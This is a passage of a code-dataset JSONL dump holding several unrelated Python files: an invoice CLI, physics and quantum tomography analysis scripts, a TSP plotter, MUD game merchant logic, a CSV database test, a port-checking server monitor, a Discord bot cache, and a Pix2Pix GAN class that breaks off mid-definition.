+{"seq_id":"150102989","text":"\"\"\"Command-line interface for the program\n\"\"\"\nfrom argparse import ArgumentParser, Namespace\nfrom .config import Config\nimport datetime\nimport sys\n\n\ndef _set_date(args) -> datetime.date:\n \"\"\"Validates the date argument, parsing the date from the ISO format\"\"\"\n date: datetime.date\n try:\n date = datetime.date.fromisoformat(args)\n except ValueError:\n date = datetime.date.today()\n return date\n\n\ndef _are_dates_valid(date_start, date_end) -> bool:\n today = datetime.date.today()\n valid = True\n if date_start > today or date_end > today or date_start > date_end:\n valid = False\n return valid\n\n\ndef parse_and_get_arguments(config: Config) -> Namespace:\n parser: ArgumentParser = ArgumentParser(\n prog=\"invoices\", description=\"Creates PDF invoices from CSV tables\"\n )\n parser.add_argument(\n \"-p\",\n \"--path\",\n default=config.get(\"database_path\"),\n help=\"Path to the invoices database to render.\",\n )\n\n subparsers = parser.add_subparsers(dest=\"command\", required=True)\n parser_config = subparsers.add_parser(\n \"config\",\n help=\"Commands related to the program's configuration.\"\n \"Set, get values, or write the default configuration to the disk.\",\n )\n parser_config.add_argument(\"-s\", \"--set\", help=\"Set an option to a given value.\")\n parser_config.add_argument(\"-g\", \"--get\", help=\"Get the value of a given option\")\n\n parser_generate = subparsers.add_parser(\n \"generate\", help=\"Generates invoices as html files, using an html template.\"\n )\n parser_generate.add_argument(\n \"-o\",\n \"--out-path\",\n help=\"Directory to generate html files into.\"\n \"Overrides the value from your configuration file.\",\n )\n parser_generate.add_argument(\n \"-t\",\n \"--template-path\",\n help=\"Path to an html file to use as a template for the invoices.\"\n \"Overrides the value from your configuration file.\",\n )\n\n parser_render = subparsers.add_parser(\"render\", help=\"command render\")\n parser_render.add_argument(\n \"--as-pdf\",\n help=\"Render the invoices as PDF files.\"\n \"Requires the program wkhtmltopdf to render the files.\",\n )\n parser_render.add_argument(\n \"--as-png\",\n help=\"Render the invoices as PNG files.\"\n \"Requires the program wkhtmltopdf to render the files.\",\n )\n parser_render.add_argument(\n \"-s\",\n \"--start-date\",\n type=_set_date,\n default=datetime.date(1900, 1, 1),\n help=\"Only render invoices after that date. The date format should be yyyy-mm-dd, for instance, 2020-10-05 for October 5, 2020.\",\n )\n parser_render.add_argument(\n \"-e\",\n \"--end-date\",\n type=_set_date,\n default=datetime.date.today(),\n help=\"Only render invoices before that date.\",\n )\n\n args = parser.parse_args()\n\n if hasattr(args, \"start_date\") and not _are_dates_valid(\n args.start_date, args.end_date\n ):\n print(\"The start and end dates are invalid. Aborting.\")\n sys.exit()\n return args\n","sub_path":"invoices-cli/modules/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618019298","text":"# import xraylib_np as xrl_np\nimport numpy as np\nimport simulation\nimport matplotlib.pyplot as plt\n\nH = np.array([0, 0, 6])\nhv = 3500\n\ntheta_min = -0.15\ntheta_max = 0.15\ntheta_step = 0.001\nx_axis = np.arange(theta_min, theta_max + theta_step, theta_step)\n\nMaterial = simulation.crystal_infor('material_info.txt')\nStrucFactor = simulation.StructureFactor(H, hv, Material)\nx_axis_real, Phase, Ref = simulation.Reflectivity(x_axis, H, hv, 1.0, 1.0, Material, mode=\"Angular\")\nx_axis_real, RC_Element, I_nor_Element = simulation.Yield('Bi', 0.0, 20, 90, 36, 1, x_axis, H, hv, 1.0, 1.0, Material)\n\n# xrl_np.XRayInit()\n# Z = np.arange(1,94,dtype=int)\n# energies = np.arange(10,10000,dtype=np.double)/100.0\n# CS = xrl_np.CS_Total_Kissel(Z,energies)\n\nf = plt.figure()\nplt.plot(x_axis_real, RC_Element)\nplt.show()","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177257767","text":"import numpy as np\nimport qutip as qtp\nfrom pycqed.analysis import analysis_toolbox as a_tools\nfrom pycqed.analysis import composite_analysis as ca\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom plotting_tools import *\nimport time\nimport os\n\nrotation_matrixes = [qtp.qeye(2).full(),\n qtp.sigmax().full(),\n qtp.rotation(qtp.sigmay(), np.pi / 2).full(),\n qtp.rotation(qtp.sigmay(), -np.pi / 2).full(),\n qtp.rotation(qtp.sigmax(), np.pi / 2).full(),\n qtp.rotation(qtp.sigmax(), -np.pi / 2).full()]\npauli_matrixes = [qtp.qeye(2).full(),\n qtp.sigmax().full(),\n qtp.sigmay().full(),\n qtp.sigmaz().full()]\npauli_ro = [qtp.qeye(2).full(),\n qtp.sigmaz().full()]\n\n\ndef get_rotation(idx):\n # j inner loop\n # i outer loop\n j = idx % 6\n i = ((idx - j)//6) % 6\n return np.kron(rotation_matrixes[i], rotation_matrixes[j])\n# return qtp.tensor(rotation_matrixes[i],rotation_matrixes[j])\n# return i,j\n\n\ndef get_pauli(idx):\n # j inner loop\n # i outer loop\n j = idx % 4\n i = ((idx - j)//4) % 4\n return np.kron(pauli_matrixes[i], pauli_matrixes[j])\n# return qtp.tensor(pauli_matrixes[i],pauli_matrixes[j])\n\n\ndef get_measurement_pauli(idx):\n # j inner loop\n # i outer loop\n j = idx % 2\n i = ((idx - j)//2) % 2\n return np.kron(pauli_ro[i], pauli_ro[j])\n# return qtp.tensor(pauli_ro[i],pauli_ro[j])\n\n\ndef unroll_mn(idx):\n # j inner loop\n # i outer loop\n j = idx % 16\n i = ((idx - j)//16) % 16\n return i, j\n\n\ndef unroll_lk(idx):\n # j inner loop\n # i outer loop\n j = idx % 36\n i = ((idx - j)//36) % 36\n return i, j\n\n\ndef get_pauli_txt(idx):\n # j inner loop\n # i outer loop\n j = idx % 4\n i = ((idx - j)//4) % 4\n return pauli_matrixes_txt[i]+pauli_matrixes_txt[j]\n\npauli_matrixes_txt = ['I', 'X', 'Y', 'Z']\n\n\ndef qpt_matrix_term(l, n, k, j, m):\n # l preparation index\n # k tomo index\n # j beta index\n # m,n process index\n # rho00 = qtp.Qobj(np.array([[1,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]),dims=[[2,2],[2,2]])\n ul = get_rotation(l)\n pm = get_pauli(m)\n uk = get_rotation(k)\n pj = get_measurement_pauli(j)\n pn = get_pauli(n)\n# trace = (ul.dag()*pn.dag()*uk.dag()*pj*uk*pm*ul*rho00).tr()\n trace = np.dot(dagger(ul), np.dot(\n dagger(pn), np.dot(dagger(uk), np.dot(pj, np.dot(uk, np.dot(pm, ul))))))[0, 0]\n# print(trace)\n return trace\n\n\ndef dagger(op):\n return np.conjugate(np.transpose(op))\n\n\ndef qtp_matrix_element(mn, lk, beta):\n # beta is wrong!\n m, n = unroll_mn(mn)\n l, k = unroll_lk(lk)\n element = 0.\n for j in range(4):\n element += beta[j]*qpt_matrix_term(l, n, k, j, m)\n# print(mn,element)\n return element\n\n\ndef calc_fidelity1(dens_mat1, dens_mat2):\n sqrt_2 = qtp.Qobj(dens_mat2).sqrtm()\n fid = ((sqrt_2 * qtp.Qobj(dens_mat1) * sqrt_2).sqrtm()).tr()\n return np.real(fid)\n\n\ndef analyze_qpt(t_start, t_stop, label): # identity tomo\n\n opt_dict = {'scan_label': label}\n\n pdict = {'I': 'I',\n 'Q': 'Q',\n 'times': 'sweep_points'}\n nparams = ['I', 'Q', 'times']\n\n tomo_scans = ca.quick_analysis(t_start=t_start, t_stop=t_stop,\n options_dict=opt_dict,\n params_dict_TD=pdict,\n numeric_params=nparams)\n assert(len(tomo_scans.TD_timestamps[:]) == 36)\n\n nr_segments = 64\n measurement_number = 36\n\n shots_q0 = np.zeros(\n (measurement_number, nr_segments, int(len(tomo_scans.TD_dict['I'][0])/nr_segments)))\n shots_q1 = np.zeros(\n (measurement_number, nr_segments, int(len(tomo_scans.TD_dict['Q'][0])/nr_segments)))\n for j in range(measurement_number):\n for i in range(nr_segments):\n shots_q0[j, i, :] = tomo_scans.TD_dict['I'][j][i::nr_segments]\n shots_q1[j, i, :] = tomo_scans.TD_dict['Q'][j][i::nr_segments]\n\n shots_q0q1 = np.multiply(shots_q1, shots_q0)\n\n avg_h1 = np.mean(shots_q0, axis=2)\n\n h1_00 = np.mean(avg_h1[:, 36:36+7], axis=1)\n h1_01 = np.mean(avg_h1[:, 43:43+7], axis=1)\n h1_10 = np.mean(avg_h1[:, 50:50+7], axis=1)\n h1_11 = np.mean(avg_h1[:, 57:], axis=1)\n\n avg_h2 = np.mean(shots_q1, axis=2)\n h2_00 = np.mean(avg_h2[:, 36:36+7], axis=1)\n h2_01 = np.mean(avg_h2[:, 43:43+7], axis=1)\n h2_10 = np.mean(avg_h2[:, 50:50+7], axis=1)\n h2_11 = np.mean(avg_h2[:, 57:], axis=1)\n\n avg_h12 = np.mean(shots_q0q1, axis=2)\n h12_00 = np.mean(avg_h12[:, 36:36+7], axis=1)\n h12_01 = np.mean(avg_h12[:, 43:43+7], axis=1)\n h12_10 = np.mean(avg_h12[:, 50:50+7], axis=1)\n h12_11 = np.mean(avg_h12[:, 57:], axis=1)\n\n avg_h12 = np.mean(shots_q0q1, axis=2)\n\n measurements_tomo = np.zeros((measurement_number*measurement_number*3))\n for i in range(measurement_number):\n # measurements_tomo[i*measurement_number*3:(i+1)*measurement_number*3] = (\n # np.array([avg_h1[i,0:36], avg_h2[i,0:36],\n # avg_h12[i,0:36]])).flatten()\n measurements_tomo[i*36:(i+1)*36] = avg_h1[i, 0:36]\n measurements_tomo[i*36+measurement_number*measurement_number:\n (i+1)*36+measurement_number*measurement_number] = avg_h2[i, 0:36]\n measurements_tomo[i*36+2*measurement_number*measurement_number:\n (i+1)*36+2*measurement_number*measurement_number] = avg_h12[i, 0:36]\n measurements_cal = np.array([[h1_00, h1_01, h1_10, h1_11],\n [h2_00, h2_01, h2_10, h2_11],\n [h12_00, h12_01, h12_10, h12_11]])\n\n t0 = time.time()\n # get the betas\n betas = np.zeros((3, 4, measurement_number))\n matrix = np.array(\n [[1, 1, 1, 1], [1, -1, 1, -1], [1, 1, -1, -1], [1, -1, -1, 1]])\n for i in range(measurement_number):\n betas[0, :, i] = np.dot(\n np.linalg.inv(matrix), measurements_cal[0, :, i])\n betas[1, :, i] = np.dot(\n np.linalg.inv(matrix), measurements_cal[1, :, i])\n betas[2, :, i] = np.dot(\n np.linalg.inv(matrix), measurements_cal[2, :, i])\n # define the matrix\n qtp_matrix = np.zeros(\n (measurement_number*measurement_number*3, 16*16), dtype=np.complex128)\n # fill the matrix\n for i in range(measurement_number*measurement_number):\n if ((i % 50) == 0):\n print(i/(measurement_number*measurement_number))\n l, k = unroll_lk(i)\n for s in range(16*16):\n qtp_matrix[i, s] = qtp_matrix_element(s, i, betas[0, :, l])\n qtp_matrix[i+measurement_number*measurement_number,\n s] = qtp_matrix_element(s, i, betas[1, :, l])\n qtp_matrix[i+2*measurement_number*measurement_number,\n s] = qtp_matrix_element(s, i, betas[2, :, l])\n t1 = time.time()\n # print((t1-t0)/(i+1))\n\n inv_matrix = np.linalg.pinv(qtp_matrix)\n chi_mat = np.dot(inv_matrix, measurements_tomo)\n t2 = time.time()\n\n chi_mat = chi_mat.reshape((16, 16))\n\n def fid(chi_mat, phi1, phi2, phi_2Q=np.pi, option=0):\n # fidelity calculation\n chi_mat_theory = np.zeros(chi_mat.shape, dtype=np.complex128)\n chi_mat_theory[0, 0] = 0.25\n chi_mat_theory[0, 3] = 0.25*np.exp(-1j*phi1)\n chi_mat_theory[0, 12] = 0.25*np.exp(-1j*phi2)\n chi_mat_theory[0, 15] = 0.25*np.exp(-1j*(phi1+phi2+phi_2Q))\n chi_mat_theory[3, 0] = 0.25*np.exp(1j*phi1)\n chi_mat_theory[3, 3] = 0.25\n chi_mat_theory[3, 12] = 0.25*np.exp(-1j*(phi1-phi2))\n chi_mat_theory[3, 15] = 0.25*np.exp(1j*(phi2+phi_2Q))\n chi_mat_theory[12, 0] = 0.25*np.exp(-1j*phi2)\n chi_mat_theory[12, 3] = 0.25*np.exp(-1j*(-phi1+phi2))\n chi_mat_theory[12, 12] = 0.25\n chi_mat_theory[12, 15] = 0.25*np.exp(1j*(phi1+phi_2Q))\n chi_mat_theory[15, 0] = 0.25*np.exp(1j*(phi1+phi2+phi_2Q))\n chi_mat_theory[15, 3] = 0.25*np.exp(-1j*(phi2+phi_2Q))\n chi_mat_theory[15, 12] = 0.25*np.exp(1j*(phi1+phi_2Q))\n chi_mat_theory[15, 15] = 0.25\n\n d = 4\n f_pro = calc_fidelity1(chi_mat, chi_mat_theory)\n f_avg = (((d*f_pro)+1)/(d+1))\n\n f_pro, f_avg = np.real_if_close(f_pro), np.real_if_close(f_avg)\n if option == 0:\n return np.real(f_avg)\n else:\n return np.real(f_pro)\n\n phi1_vec = np.linspace(-20, 20, 200)*np.pi/180.\n phi2_vec = np.linspace(-20, 20, 200)*np.pi/180.\n fid_mat = np.zeros((200, 200))\n\n for i, phi1 in enumerate(phi1_vec):\n for j, phi2 in enumerate(phi2_vec):\n fid_mat[i, j] = fid(chi_mat, phi1, phi2, np.pi)\n f_ave_opt = fid_mat.max()\n f_pro_opt = (f_ave_opt*5-1)/4\n\n # figures\n plot_times = np.arange(16)\n plot_step = plot_times[1]-plot_times[0]\n\n plot_x = np.arange(16)\n x_step = plot_x[1]-plot_x[0]\n\n # fig = plt.figure(figsize=(8,6))\n # ax = fig.add_subplot(111)\n fig, axs = plt.subplots(1, 2, figsize=(15, 5))\n ax = axs[0]\n cmin, cmax = -0.3, 0.3 # chi_mat.min(),chi_mat.max()\n fig_clim = [cmin, cmax]\n out = flex_colormesh_plot_vs_xy(ax=ax, clim=fig_clim, cmap='RdBu',\n xvals=plot_times,\n yvals=plot_x,\n zvals=np.real(chi_mat))\n ax.set_xlabel(r'Operators')\n ax.set_ylabel(r'Operators')\n # ax.set_xlim(xmin, xmax)\n ax.set_ylim(plot_x.min()-x_step/2., plot_x.max()+x_step/2.)\n ax.set_xlim(plot_times.min()-plot_step/2., plot_times.max()+plot_step/2.)\n ax.set_xticks(plot_times)\n ax.set_xticklabels([get_pauli_txt(i) for i in range(16)])\n ax.set_yticks(plot_x)\n ax.set_yticklabels([get_pauli_txt(i) for i in range(16)])\n # ax.set_xlim(0,50)\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes('right', size='10%', pad='5%')\n cbar = plt.colorbar(out['cmap'], cax=cax)\n cbar.set_ticks(\n np.arange(fig_clim[0], 1.01*fig_clim[1], (fig_clim[1]-fig_clim[0])/5.))\n cbar.set_ticklabels([str(fig_clim[0]), '', '', '', '', str(fig_clim[1])])\n cbar.set_label('Process Tomography')\n\n ax = axs[1]\n out = flex_colormesh_plot_vs_xy(ax=ax, clim=fig_clim, cmap='RdBu',\n xvals=plot_times,\n yvals=plot_x,\n zvals=np.imag(chi_mat))\n ax.set_xlabel(r'Operators')\n ax.set_ylabel(r'Operators')\n # ax.set_xlim(xmin, xmax)\n ax.set_ylim(plot_x.min()-x_step/2., plot_x.max()+x_step/2.)\n ax.set_xlim(plot_times.min()-plot_step/2., plot_times.max()+plot_step/2.)\n ax.set_xticks(plot_times)\n ax.set_xticklabels([get_pauli_txt(i) for i in range(16)])\n ax.set_yticks(plot_x)\n ax.set_yticklabels([get_pauli_txt(i) for i in range(16)])\n # ax.set_xlim(0,50)\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes('right', size='10%', pad='5%')\n cbar = plt.colorbar(out['cmap'], cax=cax)\n cbar.set_ticks(\n np.arange(fig_clim[0], 1.01*fig_clim[1], (fig_clim[1]-fig_clim[0])/5.))\n cbar.set_ticklabels([str(fig_clim[0]), '', '', '', '', str(fig_clim[1])])\n cbar.set_label('Process Tomography')\n fig.tight_layout()\n\n fig.suptitle('%s - %s: Quantum Process Tomography. F_avg = %.4f; F_opt = %.4f' % (tomo_scans.TD_timestamps[0],\n tomo_scans.TD_timestamps[\n -1],\n f_ave_opt, f_pro_opt))\n\n figname = '%s_QTP_manhattan.PNG' % tomo_scans.TD_timestamps[0]\n\n# savename = os.path.abspath(os.path.join(\n# savefolder, figname))\n# # value of 450dpi is arbitrary but higher than default\n# fig.savefig(savename, format='png', dpi=450)\n return chi_mat, f_ave_opt\n\n\ndef chi2PTM():\n return\n\n\ndef PTM2chi():\n return\n\n\ndef chi_PTM_matrices():\n return\n","sub_path":"pycqed/analysis/process_tomography.py","file_name":"process_tomography.py","file_ext":"py","file_size_in_byte":12187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"472347508","text":"from __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\ndef plot_path(tspdata, path, name):\n g = nx.Graph()\n g.add_nodes_from(range(len(tspdata.coords)))\n\n edges = [(path[i], path[i+1]) for i in range(len(path)-1)]\n g.add_edges_from(edges)\n\n pos = {}\n label_pos = {}\n for i in range(len(tspdata.coords)):\n pos[i] = (tspdata.coords[i][0], tspdata.coords[i][1])\n label_pos[i] = (pos[i][0], pos[i][1])\n\n nx.draw_networkx_nodes(g, pos, node_size=10)\n nx.draw_networkx_edges(g, pos, alpha=0.5, width=1)\n nx.draw_networkx_labels(g, label_pos, font_size=8)\n\n plt.axis('off')\n plt.title('{0}: distance = {1}'.format(name, tspdata.course_distance(path)))\n filename = 'output/{0}.png'.format(name)\n plt.savefig(filename)\n plt.close()\n # plt.show()\n\n return filename\n","sub_path":"travelling-salesman/src/tspplotter.py","file_name":"tspplotter.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180135126","text":"from accessors.CharacterAccessor import character\r\nfrom accessors.ItemAccessor import item, itemtemplate\r\nfrom accessors.GameAccessor import GameWrap\r\nfrom data.logics.logic import logic\r\n\r\ndef HasEnoughCurrency( character1, amount ):\r\n total = 0\r\n character1.BeginItem()\r\n while character1.IsValidItem():\r\n item1 = item( character1.CurrentItem() )\r\n if item1.GetTemplateId() == \"1\": # copper pieces\r\n total = total + item1.GetQuantity()\r\n character1.NextItem()\r\n\r\n if total >= amount:\r\n return True\r\n return False\r\n\r\n\r\n\r\ndef GiveCurrency( character1, recipient, amount ):\r\n character1.BeginItem()\r\n mud = GameWrap()\r\n while character1.IsValidItem():\r\n item = item( character1.CurrentItem() )\r\n if item.GetTemplateId() == \"1\": # copper pieces\r\n mud.DoAction( \"attemptgiveitem\", character1.GetId(), recipient.GetId(), item.GetId(), amount, \"\" )\r\n return\r\n character1.NextItem()\r\n\r\n\r\ndef FindName( classtype, list1, search ):\r\n newsearch = search.lower()\r\n for x in list1:\r\n item = classtype( x )\r\n if item.GetName().lower() == newsearch:\r\n return x\r\n\r\n for x in list1:\r\n item = classtype( x )\r\n name = item.GetName().lower()\r\n if name.find( newsearch ) == 0 or name.find( \" \" + newsearch ) != -1:\r\n return x\r\n\r\n return False\r\n\r\n\r\nclass merchant( logic ):\r\n def Run( self, action, arg1, arg2, arg3, arg4, data ):\r\n me = character( self.me )\r\n\r\n if action == \"do\" and data == \"list\":\r\n character1 = character( arg3 )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F>--------------------------------------------------------------------------------\" )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#FFFFFF> Item | Cost\" )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F>--------------------------------------------------------------------------------\" )\r\n for x in self.iteminventory:\r\n item = itemtemplate( x )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F> \" + item.GetName().ljust( 42 ) + \"| \" + str( item.GetAttribute( \"value\" ) ) )\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"<#7F7F7F>--------------------------------------------------------------------------------\" )\r\n return\r\n\r\n if action == \"do\" and data[:3] == \"buy\":\r\n itemname = data.split( None, 1 )\r\n itemname = itemname[1]\r\n character1 = character( arg3 )\r\n id1 = FindName( itemtemplate, self.iteminventory, itemname )\r\n if id1 == \"0\":\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"Sorry, you can't buy \" + itemname + \"here!\" )\r\n return\r\n\r\n t = itemtemplate( id1 )\r\n if not HasEnoughCurrency( character1, int(t.GetAttribute( \"value\" )) ):\r\n character1.DoAction( \"announce\", \"0\", \"0\", \"0\", \"0\", \"Sorry, you don't have enough money to buy \" + t.GetName() + \"!\" )\r\n return\r\n\r\n GiveCurrency( character1, me, t.GetAttribute( \"value\" ) )\r\n self.mud.DoAction( \"spawnitem\", id1, character1.GetId(), \"1\", \"0\", \"\" )\r\n self.mud.AddActionAbsolute( 0, \"vision\", character1.GetRoom(), \"0\", \"0\", \"0\", character1.GetName() + \" buys \" + t.GetName() + \".\" )\r\n\r\n\r\n\r\n ","sub_path":"src/data/logics/characters/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"512110559","text":"#!/usr/bin/env python3\n##############################################################################\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Hajime Nakagami\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n##############################################################################\nimport unittest\nimport io\nimport csvdb\n\n\nclass TestCsvDb(unittest.TestCase):\n def test_basic_csv(self):\n conn = csvdb.connect(io.StringIO(\n\"\"\"aaa,bbb,ccc\n1,2,3\na,b,c\nA,B,C\n\"\"\"))\n cur = conn.cursor()\n cur.execute('ccc,aaa')\n self.assertEqual(\n [d[0] for d in cur.description],\n ['ccc', 'aaa']\n )\n self.assertEqual(\n [d[6] for d in cur.description],\n [True, False]\n )\n self.assertEqual(\n cur.fetchall(),\n [('3','1'),('c','a'),('C','A')]\n )\n\n def test_null_blank_csv(self):\n conn = csvdb.connect(io.StringIO(\n\"\"\"aaa,bbb,ccc\n1,2,\na,,c\nA,\n,\n\nx\n\"\"\"))\n cur = conn.cursor()\n cur.execute('aaa,bbb,ccc')\n self.assertEqual(\n cur.fetchall(),\n [('1','2', ''),('a','', 'c'),('A','', None),('','', None),('x', None, None)]\n )\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"csvdb/test_csvdb.py","file_name":"test_csvdb.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640277094","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@author: yushuibo\n@licence: (c) Copyright 2017-2027, Node Supply China Manager Corporation Limited.\n@contact: hengchen2005@gmail.com\n@sftware: PyCharm\n@site : \n@file : progress_monitor.py\n@time: 2018/2/7 下午 02:31\n@desc: --\n'''\n\nfrom utils.monitor import Monitor\n\n\nclass ProgressMonitor(Monitor):\n\n\tdef watch(self, server):\n\t\tfor index, item in enumerate(server.tcpPorts):\n\t\t\tcmd = ['netstat -lntup|grep ', item, '|wc -l']\n\t\t\tresult = server.run_shell(''.join(cmd))\n\t\t\tif result[0] == b'0\\n':\n\t\t\t\tmsg = 'A project is not working now!\\nDetails:\\n\\tServerName:\\t{0}\\n\\tIP:\\t{1}\\n\\tProject:\\t{2}\\n\\t' \\\n\t\t\t\t\t 'TcpPort:\\t{3}'.format(server.name, server.ip, server.projects[index], item)\n\t\t\t\tself.send_mail('Fire!', ''.join(msg))\n","sub_path":"lazydog/build/lazydog_v0.1/utils/progress_monitor.py","file_name":"progress_monitor.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"504791658","text":"import typing\nfrom dataclasses import dataclass\n\nfrom discord.ext import vbu\n\nfrom . import Pp, Skill\n\n\n__all__ = (\"CachedUser\", \"get_user_cache\")\n\n\n@dataclass\nclass CachedUser:\n \"\"\"\n Represents a cached user.\n\n Attributes:\n user_id (int): The user's ID.\n skills (`list` of `:class:Pp`): The user's cached skills.\n pp (`:class:Pp`): The user's cached pp.\n \"\"\"\n\n user_id: int\n skills: typing.List[Skill]\n pp: Pp\n\n def __init__(self, user_id: int, skills: typing.List[Skill], pp: Pp):\n \"\"\"\n Represents a cached user.\n\n Args:\n user_id (int): The user's ID.\n skills (`list` of `:class:Pp`): The user's cached skills.\n pp (`:class:Pp`): The user's cached pp.\n \"\"\"\n\n self.user_id = user_id\n self.skills = skills\n self.pp = pp\n\n def get_skill(self, name: str) -> Skill:\n \"\"\"\n Gets a skill\n\n Args:\n name (`str`): The skill's name.\n\n Returns:\n `:class:Skill`: The skill.\n or `Skill`: An empty skill with `name` as the skill name.\n \"\"\"\n\n try:\n skill = next(x for x in self.skills if x.name == name)\n except StopIteration:\n skill = None\n if skill is None:\n skill = Skill(self.user_id, name=name)\n self.skills.append(skill)\n return skill\n return skill\n\n\nasync def get_user_cache(\n cog: vbu.Cog, user_id: int, db: typing.Optional[vbu.DatabaseConnection]\n) -> CachedUser:\n \"\"\"\n :coro: Returns user's cached information, if any. Otherwise returns data from the database.\n\n Args:\n cog (`:class:vbu.Cog`): The cog.\n user_id (`int`): The user's ID.\n db (:class:`voxelbotutils.DatabaseConnection`): The database connection.\n\n Returns:\n :class:`UserCache`: The user's cache.\n \"\"\"\n\n # If the user is already cached, return it\n try:\n return cog.bot.user_cache[user_id]\n\n # Otherwise, let's create it\n except KeyError:\n\n # Get the user's skills\n user_skill_rows = await db(\n \"SELECT * FROM user_skill WHERE user_id = $1\", user_id\n )\n user_skills = [Skill(**i) for i in user_skill_rows]\n\n # Now let's get the user's pp\n try:\n pp_rows = await db(\"SELECT * FROM user_pp WHERE user_id = $1\", user_id)\n user_pp = Pp(**pp_rows[0])\n\n # apparently the user doesn't have pp? Let's create one\n except IndexError:\n user_pp = Pp(user_id)\n\n # Now we add this to the user cache\n cog.bot.user_cache[user_id] = CachedUser(user_id, user_skills, user_pp)\n\n # we do a little logging. it's called: \"We do a little logging\"\n cog.logger.info(f\"Creating user cache for {user_id}... success\")\n\n # and return the user cache\n return cog.bot.user_cache[user_id]\n","sub_path":"cogs/utils/cached_user.py","file_name":"cached_user.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452652173","text":"\n# coding: utf-8\n\n\nfrom __future__ import print_function, division\n\nimport os\nimport sys\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nfrom scipy.misc import *\nfrom glob import glob\n\nfrom keras.datasets import mnist\nfrom keras_contrib.layers.normalization import InstanceNormalization\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout, Concatenate\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam\n\n\n\nclass Pix2Pix():\n def __init__(self):\n # Input shape\n self.img_rows = 128\n self.img_cols = 128\n self.channels = 1\n self.img_shape = (self.img_rows, self.img_cols, self.channels)\n\n # Configure data loader\n self.dataset_name = 'train'\n \n # Calculate output shape of D (PatchGAN)\n patch = int(self.img_rows / 2**4)\n self.disc_patch = (patch, patch, 1)\n\n # Number of filters in the first layer of G and D\n self.gf = 64\n self.df = 64\n\n optimizer = Adam(0.0002, 0.5)\n\n # Build and compile the discriminator\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss='mse', optimizer=optimizer, metrics=['accuracy'])\n\n # Build the generator\n self.generator = self.build_generator()\n \n # Input images and their conditioning images\n img_A = Input(shape=self.img_shape)\n img_B = Input(shape=self.img_shape)\n\n # By conditioning on B generate a fake version of A\n fake_A = self.generator(img_B)\n\n # For the combined model we will only train the generator\n self.discriminator.trainable = False\n\n # Discriminators determines validity of translated images / condition pairs\n valid = self.discriminator([fake_A, img_B])\n\n self.combined = Model(inputs=[img_A, img_B], outputs=[valid, fake_A])\n self.combined.compile(loss=['mse', 'mae'], loss_weights=[1, 100], optimizer=optimizer)\n\n def build_generator(self):\n \"\"\"U-Net Generator\"\"\"\n\n def conv2d(layer_input, filters, f_size=4, bn=True):\n \"\"\"Layers used during downsampling\"\"\"\n d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)\n d = LeakyReLU(alpha=0.2)(d)\n if bn:\n d = BatchNormalization(momentum=0.8)(d)\n return d\n\n def deconv2d(layer_input, skip_input, filters, f_size=4, dropout_rate=0):\n \"\"\"Layers used during upsampling\"\"\"\n u = UpSampling2D(size=2)(layer_input)\n u 